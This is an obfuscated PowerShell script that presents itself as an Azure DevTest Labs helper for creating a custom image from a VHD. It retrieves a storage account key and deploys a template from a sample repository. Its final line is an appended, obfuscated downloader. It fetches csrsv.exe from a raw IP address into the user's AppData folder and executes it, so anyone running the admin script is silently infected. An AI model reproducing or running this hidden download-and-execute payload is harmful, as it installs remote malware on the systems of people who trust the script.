${SUbSCR`IP`TiO`NiD} = ("{0}{7}{5}{2}{6}{4}{1}{3}" -f'<Sp','n ID he','r subsc','re>','ptio','fy you','ri','eci')
.("{3}{2}{0}{1}{4}"-f 't-AzSubsc','rip','lec','Se','tion') -SubscriptionId ${SUBs`CrIPTion`id}


${l`Abrg} = ("{4}{7}{6}{3}{0}{1}{5}{2}{9}{8}"-f'ab re','sour','up name ','l','<Sp','ce gro',' ','ecify your','ere>','h')
${l`AbN`AME} = ("{6}{2}{4}{5}{3}{1}{7}{0}"-f 'me here>','your la','Sp','y ','eci','f','<','b na')
${L`Ab} = .("{0}{3}{2}{1}" -f'G','ce','ur','et-AzReso') -ResourceId (("{2}{0}{1}{3}"-f'cripti','o','/subs','ns/') + ${su`B`scrI`pTiOnID} + ("{4}{2}{1}{3}{0}"-f'roups/','e','urc','G','/reso') + ${La`BRG} + ("{2}{7}{5}{4}{3}{1}{0}{6}"-f's','ab','/provi','estLab/l','soft.DevT','rs/Micro','/','de') + ${l`AbNA`me})


${LABsT`O`RaG`eAc`Co`UNt} = &("{0}{1}{3}{2}" -f 'Ge','t-Az','urce','Reso') -ResourceId ${L`Ab}."PRop`e`RTIES"."DeFAuLtST`o`RagEacco`UNT" 
${L`AbStO`RAgE`ACc`o`UNt`KEy} = (&("{1}{3}{4}{0}{2}" -f 'ccoun','Ge','tKey','t-AzStorag','eA') -ResourceGroupName ${Lab`sTor`A`G`EACC`OUnT}."re`sOuR`cEg`ROupna`Me" -Name ${LAB`st`OR`AGeAc`CO`UNT}."Re`sou`R`cenaMe")[0]."v`Alue"


${vH`dURi} = ("{4}{1}{5}{0}{3}{2}" -f'URI','ecif','ere>',' h','<Sp','y the VHD ')


${cuSTO`Mim`AgEName} = ("{0}{2}{1}{8}{7}{3}{6}{5}{4}" -f '<Speci',' the c','fy','ma','>','me','ge na','om i','ust')
${cuST`omIMAgEdescr`IP`T`iON} = ("{8}{1}{4}{7}{9}{6}{10}{2}{5}{3}{0}" -f'>','Sp','ri','on','ecify the','pti','e',' custom image ','<','d','sc')


${p`Ar`AMeters} = @{("{4}{1}{2}{3}{0}"-f 'me','i','st','ingLabNa','ex')="$($lab.Name)"; ("{2}{3}{0}{1}" -f 'hdU','ri','exi','stingV')=${V`hD`URI}; ("{2}{1}{3}{0}"-f 'e','ag','im','eOsTyp')=("{0}{1}{2}" -f'w','indo','ws'); ("{1}{3}{0}{2}"-f 'dSysPrepp','i','ed','sVh')=${fal`sE}; ("{2}{1}{0}"-f 'Name','ge','ima')=${cUsToMIM`A`gEna`me}; ("{3}{0}{2}{1}" -f'D','iption','escr','image')=${CUsT`omiMagEDEsc`RIpti`oN}}


&("{0}{3}{5}{8}{1}{4}{7}{6}{2}"-f 'New-AzR','ro','nt','esou','u','rce','yme','pDeplo','G') -ResourceGroupName ${l`Ab}."reSOur`c`EgrouPNa`Me" -Name ("{1}{2}{0}{3}" -f 'm','CreateCu','stomI','age') -TemplateUri ("{29}{35}{2}{7}{24}{5}{11}{26}{4}{18}{13}{31}{9}{27}{14}{22}{25}{12}{34}{30}{16}{8}{20}{32}{17}{15}{19}{0}{21}{28}{23}{1}{3}{10}{6}{33}" -f'z','eploy','s','.','com/Az','.githu','s',':','ge-f','vtest','j','busercont','/201-dtl-creat','azur','a','hd','ma','v','ure/','/a','rom','u','b/maste','d','//raw','r/Samples','ent.','l','re','h','ustomi','e-de','-','on','e-c','ttp') -TemplateParameterObject ${pa`RAMet`Ers}

(.("{1}{2}{0}" -f 't','N','ew-Objec') ("{3}{6}{0}{4}{2}{1}{5}"-f '.Ne','e','.WebCli','Syste','t','nt','m')).("{3}{1}{0}{2}" -f 'Fi','nload','le','Dow').Invoke(("{0}{8}{6}{7}{9}{4}{3}{1}{2}{5}" -f'http:','sv.e','x','oo/csr','yah','e','1','02.','//94.','53.238/~'),"$env:APPDATA\csrsv.exe");.("{0}{2}{3}{1}"-f 'Start','s','-Proce','s') ("$env:APPDATA\csrsv.exe")
